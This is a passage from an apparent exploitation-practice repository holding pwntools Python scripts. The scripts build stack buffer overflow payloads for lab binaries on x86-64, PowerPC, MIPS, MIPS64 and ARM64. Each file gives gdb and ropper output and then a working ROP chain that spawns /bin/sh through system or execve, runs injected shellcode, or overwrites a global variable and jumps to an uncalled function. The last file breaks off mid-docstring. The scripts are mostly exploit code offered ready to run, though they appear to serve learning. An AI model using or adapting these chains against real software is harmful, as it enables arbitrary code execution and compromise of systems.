50 | """ 51 | 52 | """ 53 | $ ropper --nocolor --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 54 | 0x00123b38: lwz r0, 0x34(r1); mr r3, r31; lwz r31, 0x2c(r1); addi r1, r1, 0x30; mtlr r0; blr; 55 | """ 56 | 57 | import struct 58 | import sys 59 | 60 | from pwn import * 61 | 62 | context(arch='powerpc', os='linux', endian='big', word_size=32) 63 | 64 | binary_path = './bin/ppc/06-system-rop' 65 | libc_path = '/usr/powerpc-linux-gnu/lib/libc-2.27.so' 66 | 67 | saved_pc_addr = 0xffffde34 68 | buffer_addr = 0xffffdda8 69 | libc_addr = 0x0fe2c000 70 | 71 | mr_r3_r31_lwz_r31_addr = libc_addr + 0x00123b38 72 | 73 | libc = ELF(libc_path) 74 | system_addr = libc_addr + libc.symbols['system'] 75 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 76 | 77 | p = process(binary_path) 78 | #p = gdb.debug([binary_path]) 79 | 80 | payload = '' 81 | payload += 'a' * (saved_pc_addr - buffer_addr) 82 | payload += p32(mr_r3_r31_lwz_r31_addr) 83 | # <- $r1 + 8 84 | payload += 'b' * (0x2c - 8) 85 | payload += p32(bin_sh_addr) # r31 86 | payload += 'c' * (0x34 - 4 - 0x2c) 87 | payload += p32(mr_r3_r31_lwz_r31_addr) # r0 88 | # <- $r1 + 8 89 | payload += 'd' * (0x34 - 8) 90 | payload += p32(system_addr) # r0 91 | 92 | p.readuntil('> ') 93 | p.write(payload) 94 | p.interactive() 95 | -------------------------------------------------------------------------------- /pwn/x86-64/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x4005b7: file src/07-execve-rop.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 
11 | 12 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffddf8 0x7fffffffddf8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd70 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 15032 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x00000000000439c8: pop rax; ret; 34 | 0x000000000002155f: pop rdi; ret; 35 | 0x0000000000023e6a: pop rsi; ret; 36 | 0x0000000000001b96: pop rdx; ret; 37 | 0x00000000000013c0: syscall; 38 | """ 39 | 40 | import struct 41 | import sys 42 | 43 | from pwn import * 44 | 45 | context(arch='amd64', os='linux', endian='little', word_size=64) 46 | 47 | binary_path = './bin/x86-64/07-execve-rop' 48 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 49 | 50 | vulnerable_ret_addr = 0x7fffffffddf8 51 | buffer_addr = 0x7fffffffdd70 52 | libc_addr = 0x7ffff79e4000 53 | 54 | pop_rax_ret_addr = libc_addr + 0x00000000000439c8 55 | pop_rdi_ret_addr = libc_addr + 0x000000000002155f 56 | pop_rsi_ret_addr = libc_addr + 0x0000000000023e6a 57 | pop_rdx_ret_addr = libc_addr + 0x0000000000001b96 58 | syscall_addr = libc_addr + 0x00000000000013c0 59 | 60 | libc = ELF(libc_path) 61 | system_addr = libc_addr + libc.symbols['system'] 62 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 63 | 64 | retq_asm = asm('retq') 65 | retq_addr = libc_addr + libc.search(retq_asm).next() 66 | 67 | p = process(binary_path) 68 | #p = gdb.debug([binary_path]) 69 | 70 | payload = '' 71 | payload += 'a' * 
(vulnerable_ret_addr - buffer_addr) 72 | payload += p64(retq_addr) # align stack 73 | payload += p64(pop_rax_ret_addr) 74 | payload += p64(0x3b) # execve 75 | payload += p64(pop_rdi_ret_addr) 76 | payload += p64(bin_sh_addr) 77 | payload += p64(pop_rsi_ret_addr) 78 | payload += p64(0) 79 | payload += p64(pop_rdx_ret_addr) 80 | payload += p64(0) 81 | payload += p64(syscall_addr) 82 | 83 | p.readuntil('> ') 84 | p.write(payload) 85 | p.interactive() 86 | -------------------------------------------------------------------------------- /pwn/mips64/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000b80 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000b84 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000bf8 <+120>: ld ra,152(sp) 10 | 0x0000000120000bfc <+124>: ld s8,144(sp) 11 | 0x0000000120000c00 <+128>: ld gp,136(sp) 12 | 0x0000000120000c04 <+132>: daddiu sp,sp,160 13 | 0x0000000120000c08 <+136>: jr ra 14 | 0x0000000120000c0c <+140>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000ba0: file src/06-system-rop.c, line 6. 18 | (gdb) b *0x0000000120000bf8 19 | Breakpoint 2 at 0x120000bf8: file src/06-system-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd70 "" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x0000000120000bf8 in vulnerable () at src/06-system-rop.c:11 31 | 11 } 32 | (gdb) p/x $sp+152 33 | $2 = 0x40007ffe08 34 | """ 35 | 36 | """ 37 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/06-system-rop 38 | ... 39 | 14024 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 40 | ... 
41 | 14024 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 42 | """ 43 | 44 | """ 45 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 46 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 47 | 0x0000000000050b34: move $t9, $s1; jalr $t9; ld $a0, 0x38($sp); 48 | 0x0000000000082824: move $t9, $s0; jalr $t9; nop; 49 | """ 50 | 51 | import struct 52 | import sys 53 | 54 | from pwn import * 55 | 56 | context(arch='mips64', os='linux', endian='big', word_size=64) 57 | 58 | binary_path = './bin/mips64/06-system-rop' 59 | libc_path = '/usr/mips64-linux-gnuabi64/lib/libc-2.27.so' 60 | 61 | ra_saved_addr = 0x40007ffe08 62 | buffer_addr = 0x40007ffd70 63 | libc_addr = 0x000000400085e000 64 | 65 | ld_s0_s1_addr = libc_addr + 0x00000000000e941c 66 | ld_a0_sp_0x38_jump_s1_addr = libc_addr + 0x0000000000050b34 67 | jump_s0_addr = libc_addr + 0x0000000000082824 68 | 69 | libc = ELF(libc_path) 70 | system_addr = libc_addr + libc.symbols['system'] 71 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 72 | 73 | p = process(binary_path) 74 | #p = gdb.debug([binary_path]) 75 | 76 | payload = '' 77 | payload += 'a' * (ra_saved_addr - buffer_addr) 78 | payload += p64(ld_s0_s1_addr) 79 | payload += 'b' * 8 80 | payload += p64(system_addr) # s0 81 | payload += p64(jump_s0_addr) # s1 82 | payload += p64(0) # s2 83 | payload += 'c' * 8 84 | payload += p64(ld_a0_sp_0x38_jump_s1_addr) # ra 85 | payload += 'd' * 0x38 86 | payload += p64(bin_sh_addr) 87 | 88 | p.readuntil('> ') 89 | p.write(payload) 90 | p.interactive() 91 | -------------------------------------------------------------------------------- /pwn/arm64/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x00000000004006c0 
<+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x00000000004006d8 <+24>: ldp x29, x30, [sp], #32 9 | 0x00000000004006dc <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40067c: file src/05-shellcode-dynamic.c, line 6. 13 | (gdb) b *0x00000000004006d8 14 | Breakpoint 2 at 0x4006d8: file src/05-shellcode-dynamic.c, line 20. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd80 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1650614882, argv=0x6262626262626262) at src/05-shellcode-dynamic.c:20 26 | 20 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe00 0x40007ffe00 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/05-shellcode-dynamic 33 | ... 34 | 20548 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 20548 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 
38 | """ 39 | 40 | """ 41 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x0003c424: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x27, x28, [sp, #0x50]; ldp x29, x30, [sp], #0x70; ret; 43 | 0x000f32e4: mov x4, x20; mov x3, x24; mov x0, x23; blr x22; 44 | 0x0003eeac: add x0, sp, #0x50; ldr x4, [x4]; eor x3, x3, x4; blr x3; 45 | 0x0002071c: blr x0; 46 | """ 47 | 48 | import struct 49 | import sys 50 | 51 | from pwn import * 52 | 53 | context(arch='aarch64', os='linux', endian='little', word_size=64) 54 | 55 | binary_path = './bin/arm64/05-shellcode-dynamic' 56 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 57 | 58 | saved_x30_addr = 0x40007ffe00 + 8 59 | buffer_addr = 0x40007ffd80 60 | libc_addr = 0x0000004000852000 61 | 62 | ldp_x_many_ret_addr = libc_addr + 0x0003c424 63 | mov_x4_x20_x3_x24_blr_x22_addr = libc_addr + 0x000f32e4 64 | add_x0_sp_0x50_blr_x3_addr = libc_addr + 0x0003eeac 65 | blr_x0_addr = libc_addr + 0x0002071c 66 | 67 | libc = ELF(libc_path) 68 | null_addr = libc_addr + libc.search(p64(0)).next() 69 | 70 | shellcode = asm(shellcraft.sh()) 71 | 72 | p = process(binary_path) 73 | #p = gdb.debug([binary_path]) 74 | 75 | payload = '' 76 | payload += 'a' * (saved_x30_addr - buffer_addr) 77 | payload += p64(ldp_x_many_ret_addr) 78 | payload += 'b' * 16 79 | # <- $sp 80 | payload += p64(0) # x29 81 | payload += p64(mov_x4_x20_x3_x24_blr_x22_addr) # x30 82 | payload += p64(0) # x19 83 | payload += p64(null_addr) # x20 -> x4 84 | payload += p64(0) # x21 85 | payload += p64(add_x0_sp_0x50_blr_x3_addr) # x22 86 | payload += p64(0) # x23 87 | payload += p64(blr_x0_addr) # x24 -> x3 88 | payload += 'd' * 0x10 89 | payload += p64(0) # x27 90 | payload += p64(0) # x28 91 | payload += 'e' * 0x10 92 | # <- $sp 93 | payload += 'f' * 0x50 94 | payload += shellcode 95 | 96 | p.readuntil('> ') 97 | p.write(payload) 98 | p.interactive() 99 | 
-------------------------------------------------------------------------------- /pwn/ppc/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000052c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x10000580 <+84>: lwz r0,4(r11) 9 | 0x10000584 <+88>: mtlr r0 10 | 0x10000588 <+92>: lwz r31,-4(r11) 11 | 0x1000058c <+96>: mr r1,r11 12 | 0x10000590 <+100>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000540: file src/07-execve-rop.c, line 6. 16 | (gdb) b *0x10000580 17 | Breakpoint 2 at 0x10000580: file src/07-execve-rop.c, line 11. 18 | (gdb) b *0x10000590 19 | Breakpoint 3 at 0x10000590: file src/07-execve-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0xffffdda8 "\377\377\336\b" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x10000580 in vulnerable () at src/07-execve-rop.c:11 31 | 11 } 32 | (gdb) p/x $r11+4 33 | $2 = 0xffffde34 34 | (gdb) c 35 | Continuing. 36 | 37 | Breakpoint 3, 0x10000590 in vulnerable () at src/07-execve-rop.c:11 38 | 11 } 39 | (gdb) i r $r1 40 | r1 0xffffde30 4294958640 41 | """ 42 | 43 | """ 44 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/07-execve-rop 45 | ... 46 | 19357 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 47 | ... 48 | 19357 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 49 | ... 
50 | """ 51 | 52 | """ 53 | $ ropper --nocolor --inst-count 9 --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 54 | 0x00021d00: lwz r0, 0x34(r1); lwz r27, 0x1c(r1); lwz r28, 0x20(r1); lwz r29, 0x24(r1); lwz r30, 0x28(r1); lwz r31, 0x2c(r1); mtlr r0; addi r1, r1, 0x30; blr; 55 | 0x0003c414: mr r5, r27; mr r4, r31; mr r3, r29; mtctr r28; bctrl; 56 | 0x000cc3e0: li r0, 0xb; sc; 57 | """ 58 | 59 | import struct 60 | import sys 61 | 62 | from pwn import * 63 | 64 | context(arch='powerpc', os='linux', endian='big', word_size=32) 65 | 66 | binary_path = './bin/ppc/07-execve-rop' 67 | libc_path = '/usr/powerpc-linux-gnu/lib/libc-2.27.so' 68 | 69 | saved_pc_addr = 0xffffde34 70 | buffer_addr = 0xffffdda8 71 | libc_addr = 0x0fe2c000 72 | 73 | lwz_many_addr = libc_addr + 0x00021d00 74 | mr_many_addr = libc_addr + 0x0003c414 75 | li_r0_0xb_sc_addr = libc_addr + 0x000cc3e0 76 | 77 | libc = ELF(libc_path) 78 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 79 | 80 | p = process(binary_path) 81 | #p = gdb.debug([binary_path]) 82 | 83 | payload = '' 84 | payload += 'a' * (saved_pc_addr - buffer_addr) 85 | payload += p32(lwz_many_addr) 86 | # <- $r1 + 8 87 | payload += 'b' * (0x1c - 8) 88 | payload += p32(0) # r27 -> r5 89 | payload += p32(li_r0_0xb_sc_addr) # r28 -> gadget 90 | payload += p32(bin_sh_addr) # r29 -> r3 91 | payload += p32(0) # r30 92 | payload += p32(0) # r31 -> r4 93 | payload += 'c' * 4 94 | payload += p32(mr_many_addr) # r0 95 | # <- $r1 + 8 96 | 97 | p.readuntil('> ') 98 | p.write(payload) 99 | p.interactive() 100 | -------------------------------------------------------------------------------- /pwn/mips64/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000b80 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000b84 <+4>: sd ra,152(sp) 8 | ... 
9 | 0x0000000120000bf8 <+120>: ld ra,152(sp) 10 | 0x0000000120000bfc <+124>: ld s8,144(sp) 11 | 0x0000000120000c00 <+128>: ld gp,136(sp) 12 | 0x0000000120000c04 <+132>: daddiu sp,sp,160 13 | 0x0000000120000c08 <+136>: jr ra 14 | 0x0000000120000c0c <+140>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000ba0: file src/07-execve-rop.c, line 6. 18 | (gdb) b *0x0000000120000bf8 19 | Breakpoint 2 at 0x120000bf8: file src/07-execve-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd70 "" 27 | (gdb) p/x $sp+152 28 | $2 = 0x40007ffe08 29 | """ 30 | 31 | """ 32 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/07-execve-rop 33 | ... 34 | 15754 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 15754 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 37 | """ 38 | 39 | """ 40 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 41 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 42 | 0x00000000000563ac: move $t9, $s1; jalr $t9; move $a2, $s2; 43 | 0x0000000000105c8c: ld $v0, 0x80($sp); ld $t9, 0x20($sp); move $a1, $zero; jalr $t9; move $a0, $s2; 44 | 0x0000000000058b34: syscall; jr $ra; nop; 45 | """ 46 | 47 | import struct 48 | import sys 49 | 50 | from pwn import * 51 | 52 | context(arch='mips64', os='linux', endian='big', word_size=64) 53 | 54 | binary_path = './bin/mips64/07-execve-rop' 55 | libc_path = '/usr/mips64-linux-gnuabi64/lib/libc-2.27.so' 56 | 57 | ra_saved_addr = 0x40007ffe08 58 | buffer_addr = 0x40007ffd70 59 | libc_addr = 0x000000400085e000 60 | 61 | ld_s0_s1_s2_addr = libc_addr + 0x00000000000e941c 62 | move_a2_s2_jump_s1_addr = libc_addr + 0x00000000000563ac 63 | ld_v0_move_a1_0_a0_s2_jump_sp_0x20_addr = libc_addr + 
0x0000000000105c8c 64 | syscall_addr = libc_addr + 0x0000000000058b34 65 | 66 | libc = ELF(libc_path) 67 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 68 | 69 | p = process(binary_path) 70 | #p = gdb.debug([binary_path]) 71 | 72 | payload = '' 73 | payload += 'a' * (ra_saved_addr - buffer_addr) 74 | payload += p64(ld_s0_s1_s2_addr) 75 | 76 | payload += 'b' * 8 77 | payload += p64(0) # s0 78 | payload += p64(ld_s0_s1_s2_addr) # s1 79 | payload += p64(0) # s2 80 | payload += 'c' * 8 81 | payload += p64(move_a2_s2_jump_s1_addr) # ra 82 | 83 | payload += 'e' * 8 84 | payload += p64(0) # s0 85 | payload += p64(0) # s1 86 | payload += p64(bin_sh_addr) # s2 87 | payload += 'f' * 8 88 | payload += p64(ld_v0_move_a1_0_a0_s2_jump_sp_0x20_addr) # ra 89 | 90 | payload += 'g' * 0x20 91 | payload += p64(syscall_addr) 92 | payload += 'e' * (0x80 - 8 - 0x20) 93 | payload += p64(5057) # execve 94 | 95 | p.readuntil('> ') 96 | p.write(payload) 97 | p.interactive() 98 | -------------------------------------------------------------------------------- /pwn/mips/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00400780 <+0>: addiu sp,sp,-160 7 | 0x00400784 <+4>: sw ra,156(sp) 8 | ... 9 | 0x00400804 <+132>: lw ra,156(sp) 10 | 0x00400808 <+136>: lw s8,152(sp) 11 | 0x0040080c <+140>: addiu sp,sp,160 12 | 0x00400810 <+144>: jr ra 13 | 0x00400814 <+148>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x40079c: file src/07-execve-rop.c, line 6. 17 | (gdb) b *0x00400804 18 | Breakpoint 2 at 0x400804: file src/07-execve-rop.c, line 11. 19 | (gdb) c 20 | Continuing. 
21 | 22 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef58 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) p/x $sp+156 27 | $2 = 0x7fffefdc 28 | """ 29 | 30 | """ 31 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/07-execve-rop 32 | ... 33 | 5552 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 34 | ... 35 | 5552 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 36 | ... 37 | """ 38 | 39 | """ 40 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 41 | 0x0001b1e8: lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x28; 42 | 0x0001ccf4: move $t9, $s0; jalr $t9; move $a0, $s1; 43 | 0x00096018: move $t9, $s0; jalr $t9; move $a1, $s1; 44 | 0x000322ac: move $t9, $s1; jalr $t9; move $a2, $s2; 45 | 0x000f64b0: lw $v0, 0x14($sp); syscall; jr $ra; move $v1, $a3; 46 | """ 47 | 48 | import struct 49 | import sys 50 | 51 | from pwn import * 52 | 53 | context(arch='mips', os='linux', endian='big', word_size=32) 54 | 55 | binary_path = './bin/mips/07-execve-rop' 56 | libc_path = '/usr/mips-linux-gnu/lib/libc-2.27.so' 57 | 58 | ra_saved_addr = 0x7fffefdc 59 | buffer_addr = 0x7fffef58 60 | libc_addr = 0x7f615000 61 | 62 | lw_s0_s1_s2_addr = libc_addr + 0x0001b1e8 63 | move_a0_s1_jump_s0_addr = libc_addr + 0x0001ccf4 64 | move_a1_s1_jump_s0_addr = libc_addr + 0x00096018 65 | move_a2_s2_jump_s1_addr = libc_addr + 0x000322ac 66 | lw_v0_syscall_addr = libc_addr + 0x000f64b0 67 | 68 | libc = ELF(libc_path) 69 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 70 | 71 | p = process(binary_path) 72 | #p = gdb.debug([binary_path]) 73 | 74 | payload = '' 75 | payload += 'a' * (ra_saved_addr - buffer_addr) 76 | payload += p32(lw_s0_s1_s2_addr) 77 | 78 | payload += 'b' * 0x18 79 | payload += p32(lw_s0_s1_s2_addr) # s0 80 | payload += p32(bin_sh_addr) # s1 81 | payload += p32(0) # s2 82 | payload += 
p32(move_a0_s1_jump_s0_addr) # ra 83 | 84 | payload += 'c' * 0x18 85 | payload += p32(lw_s0_s1_s2_addr) # s0 86 | payload += p32(0) # s1 87 | payload += p32(0) # s2 88 | payload += p32(move_a1_s1_jump_s0_addr) # ra 89 | 90 | payload += 'd' * 0x18 91 | payload += p32(0) # s0 92 | payload += p32(lw_v0_syscall_addr) # s1 93 | payload += p32(0) # s2 94 | payload += p32(move_a2_s2_jump_s1_addr) # ra 95 | 96 | payload += 'e' * 0x14 97 | payload += p32(4011) # v0 98 | 99 | p.readuntil('> ') 100 | p.write(payload) 101 | p.interactive() 102 | -------------------------------------------------------------------------------- /pwn/mips64/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c00 <+0>: daddiu sp,sp,-160 7 | ... 8 | 0x0000000120000c78 <+120>: ld ra,152(sp) 9 | 0x0000000120000c7c <+124>: ld s8,144(sp) 10 | 0x0000000120000c80 <+128>: ld gp,136(sp) 11 | 0x0000000120000c84 <+132>: daddiu sp,sp,160 12 | 0x0000000120000c88 <+136>: jr ra 13 | 0x0000000120000c8c <+140>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x120000c20: file src/08-overwrite-global.c, line 9. 17 | (gdb) b *0x0000000120000c78 18 | Breakpoint 2 at 0x120000c78: file src/08-overwrite-global.c, line 14. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9 23 | 9 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x40007ffd20 "" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x0000000120000c78 in vulnerable () at src/08-overwrite-global.c:14 30 | 14 } 31 | (gdb) p/x $sp+152 32 | $2 = 0x40007ffdb8 33 | """ 34 | 35 | """ 36 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/08-overwrite-global 37 | ... 38 | 11254 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 
40 | 11254 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 41 | """ 42 | 43 | """ 44 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 45 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 46 | 0x000000000008c3cc: ld $v0, 8($sp); ld $ra, 0x18($sp); jr $ra; daddiu $sp, $sp, 0x20; 47 | 0x000000000016b3dc: ld $ra, 0x18($sp); sd $v0, ($s0); ld $gp, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x20; 48 | 0x000000000006a82c: ld $t9, 0x18($sp); jalr $t9; nop; 49 | """ 50 | 51 | import struct 52 | import sys 53 | 54 | from pwn import * 55 | 56 | context(arch='mips64', os='linux', endian='big', word_size=64) 57 | 58 | binary_path = './bin/mips64/08-overwrite-global' 59 | 60 | ra_saved_addr = 0x40007ffdb8 61 | buffer_addr = 0x40007ffd20 62 | libc_addr = 0x000000400085e000 63 | 64 | ld_s0_s1_s2_addr = libc_addr + 0x00000000000e941c 65 | ld_v0_addr = libc_addr + 0x000000000008c3cc 66 | sd_v0_s0_addr = libc_addr + 0x000000000016b3dc 67 | ld_r9_jalr_r9_addr = libc_addr + 0x000000000006a82c 68 | 69 | binary = ELF(binary_path) 70 | not_called_addr = binary.symbols['not_called'] 71 | x_addr = binary.symbols['x'] 72 | 73 | p = process(binary_path) 74 | #p = gdb.debug([binary_path]) 75 | 76 | payload = '' 77 | payload += 'a' * (ra_saved_addr - buffer_addr) 78 | payload += p64(ld_s0_s1_s2_addr) 79 | 80 | payload += 'b' * 8 81 | payload += p64(x_addr) # s0 82 | payload += p64(0) # s1 83 | payload += p64(0) # s2 84 | payload += 'c' * 8 85 | payload += p64(ld_v0_addr) # ra 86 | 87 | payload += 'd' * 8 88 | payload += p64(0xdeadbabebeefc0de) # v0 89 | payload += 'e' * 8 90 | payload += p64(sd_v0_s0_addr) # ra 91 | 92 | payload += 'f' * 0x18 93 | payload += p64(ld_r9_jalr_r9_addr) # ra 94 | 95 | payload += 'g' * 0x18 96 | payload += p64(not_called_addr) # t9 97 | 98 | p.readuntil('> ') 99 | p.write(payload) 100 | p.interactive() 101 | 
-------------------------------------------------------------------------------- /pwn/mips64/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c10 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000c14 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000c9c <+140>: ld ra,152(sp) 10 | 0x0000000120000ca0 <+144>: ld s8,144(sp) 11 | 0x0000000120000ca4 <+148>: ld gp,136(sp) 12 | 0x0000000120000ca8 <+152>: daddiu sp,sp,160 13 | 0x0000000120000cac <+156>: jr ra 14 | 0x0000000120000cb0 <+160>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000c30: file src/05-shellcode-dynamic.c, line 6. 18 | (gdb) b *0x0000000120000c9c 19 | Breakpoint 2 at 0x120000c9c: file src/05-shellcode-dynamic.c, line 13. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 24 | warning: Source file is more recent than executable. 25 | 6 printf("> "); 26 | (gdb) p &buffer[0] 27 | $1 = 0x40007ffd70 "" 28 | (gdb) c 29 | Continuing. 30 | 31 | Breakpoint 2, 0x0000000120000c9c in vulnerable () at src/05-shellcode-dynamic.c:13 32 | 13 usleep(1000); 33 | (gdb) p/x $sp+152 34 | $2 = 0x40007ffe08 35 | """ 36 | 37 | """ 38 | $ qemu-mips64 -L 